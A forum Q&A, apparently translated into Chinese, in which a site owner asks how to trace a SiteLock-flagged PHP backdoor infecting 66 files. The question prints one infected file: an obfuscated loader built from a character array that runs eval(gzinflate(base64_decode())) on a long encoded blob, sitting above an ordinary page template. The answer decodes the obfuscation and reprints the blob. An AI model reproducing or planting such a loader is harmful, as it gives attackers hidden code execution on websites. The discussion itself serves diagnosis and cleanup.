PHP文件感染了SiteLock-PHP-BACKDOOR-GENERIC-co.NunFFICIAL

Question

我测试了我的网站的感染情况，发现有66个文件是php文件被感染了，但我真的无法将任何恶意代码写入这些文件，也不知道如何从这些文件中删除感染。下面是我的scan ->的屏幕截图

​

​

我检查了所有这些文件中的恶意代码，并将其与我的旧备份进行了比较，但没有发现任何可疑的东西。此外，谷歌了很多和溢出堆栈溢出搜索，但没有帮助。请至少帮我找出追踪病毒代码的方法。

下面是单个文件的代码：

    <?php
$md5 = "23423b2hj34j23b4hj23b4jk23bjb4bb34jb";
$aa = array('l','z','v',"s",';',"a",'n',"4",'i',"6",'f',"$",'e',"(",'c',"d",")","o",'b',"t","g",'r',"_");
$ba4 = create_function('$'.'v',$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]);
$ba4('FZdFrsWIkkSX86vkgZnU+gPjNTNPWmZm9ur79RIyMyLyRHmlwz/1107VkB7lP1m6lwT2v0WZz0X5z3/EpBK33Ze33gcX4vTtpIOcURy/1Q6SHVOqCiGtLB9ekkfzKRiwDzRgCoVHBQ0sdEACxkNQUl6HTSPwj27HXZIEt+MxmVnOSjkQEEe05XOri/PUmK5rfQEB9TpAJfnJ2eAyfVvN9u+yZ5QsLdwT8B5AQZIsPUg2BWb/NTN3SRdV3nbz40DClTAqgftZ75srankP0xPcikrjRXDxBdx4yFPLWbFCqThR+d1MnLFzZA7zx8ImfXp3DD3L5XOcXgpU8+ZAivfQODjkx7Z3CWi3izPoMVg/1Fap7Obf+0qA98jVCxnYJPgb2MQg64rpq0v074FQIRU1wruf7FiiG9Of8KiiAbeHi+PnKqg8XIh1dsqFK9PVw4gXTr9PMo75YOiLLEMMrptizkI5J3uhdvs1sIubmyGcZQRa3UbHdGCGWZuKprno94K76/CFNtsAlcihZZrE91d6a3mjfTWOZet4jn5CGS4KLrUOY1PZ6vRLUB0dwuApFhv08LI+51JyPwY5s6pftSXpTvK3dHHNtcDK6sQqBVMILLD8M1POcbQUA1h/cWlTDvHZJny9h55VynFyRhF8Enrjes9u4Ac2lsqkUHsups49pWZK9MkKSn4OIr6b6eDi31Fk03wc9hEZHkjFdWytbWRfOMjYfTSk9YojVVTm8cI0VbZ3N67RCG0uLOYPrwOvgYqvIpdjQiDqsD+0qTRnu7UCfdovAlPOZ+P0Jd/9F/TqFGgMVQVTf0KDRll+3zkEfBYbjjkhBGHJgbjhghjGHJGHJghjgHJGhjgHJGHJgy7776hjbhbbbLHb0qY4yyqTPLx+VVW8b7P0OIxokYMcRhLQ8M0+Ds+7vtazOOTP0MxQQVRxc2AebmHcB+epjGKOWiv9uZ9B9hpjrWmrfapY98VtyK3Wshzy/rY9IlK3u4pI8cE3Mk6sg+RKM3purPmi5mNANzT1eggihGzqRmm5mwQeurKF84QRUwLkWzH3acwsg02qbUghwPZaGZLrHsI6BUszrxPLuwbSLWnmRZAg5NaUw4lEf0a1tk92ZUIDkbQmuLAzeCzv/iSsZKrIO7auxAPrY6puYeFp9iS/Te3Om1etZ0EOYNkNJuO6ymAZl2lMxlYdBJpG0WP0rSP2PBcF00mzWLyvSbYWpClmefOJR17oUXBaLa1vCLOK64mRzObjHmbOW7G1jT9QY+U34XVHVv6i/QsMJUGxngBSxLZxbI11Jv4dQATJmzWhomorkobiFi4lEw9MDEiFAEgU6jjltnbgtfFxbVzsCIjZDZST4J4mshgL7+zYd2uCvXKFqWXI6w0g0/gCacs9+3VFI1PFTX6Mxd7kYWHnn1IYGxhMgPlrvclnH68+2pI86cF16uQkyDnKwQEQDHlHbyrug1bfDNj5DLegEyf6fc1v/ybpo/yf9vpYocvgJTavF9uxb0HlpGx2lQGcyteFMSPTUA7B1gDokgQsmY170LZJURN0vXLpMxplfpiPIy6J4XcTZIgmNqiwaQ0DyI2AKqy2yV3eui7JXlDmmhC5f5yKFeMLVELdOMnQbHGXYbc11jJUAPhi5+Xp+psSjhdupEp8Kr7is8cTQOduoJZr33RptDplFK5EmeV51vs7mpskdpZC90DX0Ozg5Lm4vI71GSid3tZ4nKdMXyk0ktMvrvWlwnK0W+0TI5nsRLI3bvfMbXVxjvjKwK2gFK/fqCNg62Dr7a0n7rc/RzM7H035BbRvo5RrtOBP+rpNGSxd/JYeWfFg4APMHcD2Qjooiq8tVQIOwr8PeK4edvjjtNxrJx91UVZcFogm3A6A1SryW/RnyRKaSUTbufBUDDAVhaMKV9deq4YV2cEqSVq00iBD8iT/a7DrlNpbY0oul6wGKdvzOEeqvPi7wku6IVFV/ZB7EJ0PXJ5Jlxu3HzbAINFZCM/nBBa09avXobE5SnmL5TjW4xdQyWgWziB+OljtWLTNbWsZRJfSN3VOopcxQLJXJRxS3YEgU/GXK5DagrWG80jbUiymsLTopDGzbRmzoSpYTn1AA/Bc5kBSqRoKm1G4BpfVmhyiKIx+NJfV1blySzZYgr5S3Lukwf6pS1w7qdsDIkwEFG+hWL2QKpFAnnWhKwVDr1l9ZjYLyB6N6uxedU5qm+dSY9uQ9M5xqbiI+RLyZG4hpyUF5aV1d1Zk/y3E3DLVK/w4A8d+eRPGdI4oyfOajKnp0r4crlgKFvxchzKAmsIHGMYKGLeIHwKqDX6lbca53i4d5ctaZr6Fc0KpMhKFMrPdD0g/MZ64iht/NWpwMU6vMZmLLlgNc2+qt5TQtGFbvCUuhtcdHQ12E02eYMNljwZj4yi0V6CaejVUFfGMJHumABVymJS3NfE3KbPQ0z+j8yai/yNdKToJHUGHUIGgtcvTYVTYnINIyuguyBVxPjtz/l3hpeWqJJez+8EDY3Oa5M8qcgOvsttw9mwKTgZ8DygZ5xPLpwVoyav9KwUf9dw808wWmPX9ieZA25yH2z5atvVWsZY+J1mGAkeiEvrH6PbjxtWhAZ8qaV7E9Bz6VBJqcQEwNELCmVhgxIWAN+gLeUh2E/8J3UC2LmRYcBhCevKfBQLy9URqk+KFPmCjRL/bsVfA9lH+pD8W39o5/MjV12GcZ6bSD48RBtQJJr4Yw8wbN5cAmiIaHnyYJgmAUMhwMnDX8j3DmYmu6qc+OiL6h9JXHmiw6Ptr3dPg5FEnyZD+Us9j7Ey4MuERE30JTobEMajHkOibIjuuhfswskJfaHySQtMEqFI53H5tT6XhSUs3qq3okLSdt6n9MfyLQEiG7J9Gzdg1B8smWDNaJy6h7wEzZgV5ATzgA5NhuuPsvGvtD6OIDCq2YgJNY3V/U+TrDzhLKE1Yac7SPGH4zHcqZa0vX8rd1kzEQu6RA5q+8PGVSGjsxPjLJv7J1hdXfcwlL4FLSLL++/+ANFLLx1RMpdvVw3BbveX7lnjA5j+HMyFf48ySBCWYDZBoB8Lqe2uYLZw74SAAZ1jPfUPqqfUrNIxDhjP/PPPlzprjxtdsoOotQR8DHmTDuffDcqsTlAmy8x2ihCX3THlMa9aAZ0tiuHJBHbHUByuIONJHIUuygyubhIUGH87yjkbtSON2pmo/fHbILf6Y6cHsW1Qw3Dr+IJScnqu61QCopcs9tFOoPYp4RmTC5V+uTZs/fuCuzVMqTxbsERQuC1ury3XZwr9V0Yx7MCydoyQeFGVQbc7kaikXeu884PTeRuzI7ZqW3DqQp6BggUzY2lGyD3p35f4MJigzOYiPa9hJqwwh+CubIO87j9xDkLr5cUvJAb0WeYokOt+hPztfzM1H/Z7b5FH/roiV4qgZDXX2lEhswnpTbqErRdkJZO6pt7sTa+kX6htSAIN4n479VHs+XhIqcl6omWvDC3+1KBowhtUw/x7I6g6CGep/SmxhjV3wY/oHXl8e0UzZJbQusVh8GH8t7eiUI/kFFaFj2guSPrw64DnCVrPJf31uzLteT9xcx2gDdnaz6QMxJ66I6XvP+Tp12ao3Vi+lozuJjBka6jWukdGLewo/aFhwzzlAsW8vRTHYkXNAM9nGE3gYkxhGjO5qsAFzyj94Js6r5IIW28T73lwF2/4ShmFcRu5H2/CvBAQvFEVB8G+u//73P//+++///B8=');
?>
<?php include 'biComposer/start.php' ?>
<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> 
<html class="no-js"> <!--<![endif]-->
  <head>
    <title>Lorem Ipsum is simply dummy text </title>
    <meta name="description" content="" />
    <?php include_partial('meta') ?>
  </head>

  <body>

    <?php include_partial('header', array('caption' => 'about')) ?>

    <section class="main">
      <div class="content">
        <article>
          <h1>about us</h1>
          <h3>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard</h3>
          <p>
            Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
          </p>
          <div class="txt-align-center" style="margin:40px 0;">
            <img src="images/land-acquisition.jpg" alt="">
          </div>
          <p>
           Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has


          </p>
          <div class="txt-align-center" style="margin:40px 0;">
            <img src="images/business-division.jpg" alt="" usemap="#Map">
            <map name="Map">
              <area shape="rect" coords="46,100,200,158">
              <area shape="rect" coords="224,100,380,158">
              <area shape="rect" coords="405,100,555,158">
              <area shape="rect" coords="582,101,732,159">
            </map>
          </div>
        </article>
      </div>
    </section>

    <?php include_partial('footer') ?>

  </body>

 <?php include_partial('js') ?>

</html>

Answer 1

所以：

$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]

实际上是

eval(gzinflate(base64_decode($v)));

但是，如果我们将$v设置为

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

我使用PHP5.2.5得到了一个data error，这里也发生了同样的事情：http://sandbox.onlinephpfunctions.com/code/f7fb8d6e35bede9f007b2d77ee87e30957825e0a